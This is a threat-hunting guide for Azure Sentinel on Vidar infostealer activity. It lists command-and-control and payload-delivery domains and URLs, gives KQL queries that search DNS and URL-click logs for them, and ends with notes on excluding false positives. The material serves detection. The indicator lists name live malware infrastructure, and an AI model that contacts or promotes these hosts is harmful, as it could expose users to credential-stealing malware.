The hunt hypothesis detects potential Vidar malware activity through indicators of compromise associated with credential theft and data exfiltration. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate advanced persistent threats before significant data loss occurs.
IOC Summary
Malware Family: Vidar Total IOCs: 11 IOC Types: url, domain
| Type | Value | Threat Type | First Seen | Confidence |
|---|---|---|---|---|
| url | hxxps://jumpthehurdle.com/ | payload_delivery | 2026-05-22 | 75% |
| url | hxxps://pfo.fbvendas.com/ | botnet_cc | 2026-05-22 | 100% |
| url | hxxps://pfo.adasm188.top/ | botnet_cc | 2026-05-22 | 100% |
| domain | pfo.fbvendas.com | botnet_cc | 2026-05-22 | 100% |
| domain | pfo.adasm188.top | botnet_cc | 2026-05-22 | 100% |
| domain | hms.xybcaap.my.id | botnet_cc | 2026-05-22 | 100% |
| url | hxxps://hms.xybcaap.my.id/ | botnet_cc | 2026-05-22 | 100% |
| domain | mal.fbvendas.com | botnet_cc | 2026-05-22 | 100% |
| url | hxxps://mal.fbvendas.com/ | botnet_cc | 2026-05-22 | 100% |
| domain | mal.adasm188.top | botnet_cc | 2026-05-22 | 100% |
| url | hxxps://mal.adasm188.top/ | botnet_cc | 2026-05-22 | 100% |
// Hunt for DNS queries to known malicious domains
// Source: ThreatFox - Vidar
let malicious_domains = dynamic(["pfo.fbvendas.com", "pfo.adasm188.top", "hms.xybcaap.my.id", "mal.fbvendas.com", "mal.adasm188.top"]);
DnsEvents
| where Name has_any (malicious_domains)
| project TimeGenerated, Computer, Name, IPAddresses, QueryType
| order by TimeGenerated desc// Hunt for access to known malicious URLs
// Source: ThreatFox - Vidar
let malicious_urls = dynamic(["https://jumpthehurdle.com/", "https://pfo.fbvendas.com/", "https://pfo.adasm188.top/", "https://hms.xybcaap.my.id/", "https://mal.fbvendas.com/", "https://mal.adasm188.top/"]);
UrlClickEvents
| where Url has_any (malicious_urls)
| project Timestamp, AccountUpn, Url, ActionType, IsClickedThrough
| order by Timestamp desc| Sentinel Table | Notes |
|---|---|
DnsEvents | Ensure this data connector is enabled |
UrlClickEvents | Ensure this data connector is enabled |
Scenario: Scheduled System Maintenance Task
Description: A legitimate scheduled task runs a script that uses curl or wget to download updates from a trusted internal repository.
Filter/Exclusion: Exclude processes initiated by schtasks.exe or tasks with a known name like UpdateCheckTask.
Scenario: Admin Using PowerShell for Remote Management
Description: An administrator uses PowerShell to remotely manage a server, which may involve downloading temporary files or scripts from a trusted internal server.
Filter/Exclusion: Exclude processes initiated by powershell.exe with a command line containing -Command or -File and a known admin script path.
Scenario: Log Collection via WinSCP
Description: A system administrator uses WinSCP to transfer log files from a remote server to a central logging server.
Filter/Exclusion: Exclude processes initiated by winscp.exe or with a command line containing scp or sftp and a known log transfer script.
Scenario: Software Update via Chocolatey
Description: A package manager like Chocolatey is used to install or update software, which may involve downloading packages from a trusted internal feed.
Filter/Exclusion: Exclude processes initiated by choco.exe or with a command line containing install or update and a known internal package source.
Scenario: Internal Monitoring Tool Data Exfiltration
Description: A legitimate internal monitoring tool (e.g., Nagios, Zabbix) sends metrics or logs to a central monitoring server.
Filter/Exclusion: Exclude processes initiated by the monitoring tool’s service or with a command line containing the tool’s known executable name and internal server IP.